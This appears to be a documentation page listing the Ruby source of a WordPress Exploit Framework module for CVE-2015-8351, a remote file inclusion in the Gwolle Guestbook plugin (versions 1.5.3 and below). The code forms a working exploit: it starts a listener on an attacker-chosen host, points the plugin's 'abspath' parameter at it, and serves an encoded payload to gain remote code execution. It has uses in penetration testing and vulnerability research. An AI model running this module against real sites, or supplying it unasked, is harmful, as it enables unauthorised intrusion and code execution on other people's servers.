class Wpxf::Exploit::GwolleGuestbookRemoteFileInclusion

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Net::HttpServer::new
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 7
def initialize
  super

  update_info(
    name: 'Gwolle Guestbook Remote File Inclusion',
    desc: 'The Gwolle Guestbook plugin, in versions 1.5.3 and below, '\
          'allows for remote file inclusion and remote code execution. '\
          'This exploit only works when the PHP option "allow_url_include" '\
          'is enabled (disabled by default).',
    author: [
      'High-Tech Bridge Security Research Lab', # Vulnerability disclosure
      'rastating'                               # WPXF module
    ],
    references: [
      ['CVE', '2015-8351'],
      ['EDB', '38861']
    ],
    date: 'Nov 04 2015'
  )

  register_options([
    StringOption.new(
      name: 'rfi_host',
      desc: 'The address of the host listening for a connection',
      required: true
    ),
    StringOption.new(
      name: 'rfi_path',
      desc: 'The path to access via the remote file inclusion request',
      default: Utility::Text.rand_alpha(8),
      required: true
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 46
def check
  check_plugin_version_from_readme('gwolle-gb', '1.5.4')
end
on_http_request(path, params, headers) click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 62
def on_http_request(path, params, headers)
  payload.encoded
end
plugin_url() click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 42
def plugin_url
  normalize_uri(wordpress_url_plugins, 'gwolle-gb')
end
rfi_host() click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 50
def rfi_host
  normalized_option_value('rfi_host')
end
rfi_path() click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 54
def rfi_path
  normalized_option_value('rfi_path')
end
rfi_url() click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 58
def rfi_url
  "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}"
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 70
def run
  return false unless super

  start_http_server(true)

  emit_info 'Executing request...'
  res = execute_get_request(
    url: vulnerable_url,
    params: { 'abspath' => rfi_url }
  )
  stop_http_server

  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{res.body}", true

  if res.body =~ /allow_url_include/
    emit_error 'allow_url_include appears to be disabled'
    return false
  end

  if res && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  end

  true
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 66
def vulnerable_url
  normalize_uri(plugin_url, 'frontend', 'captcha', 'ajaxresponse.php')
end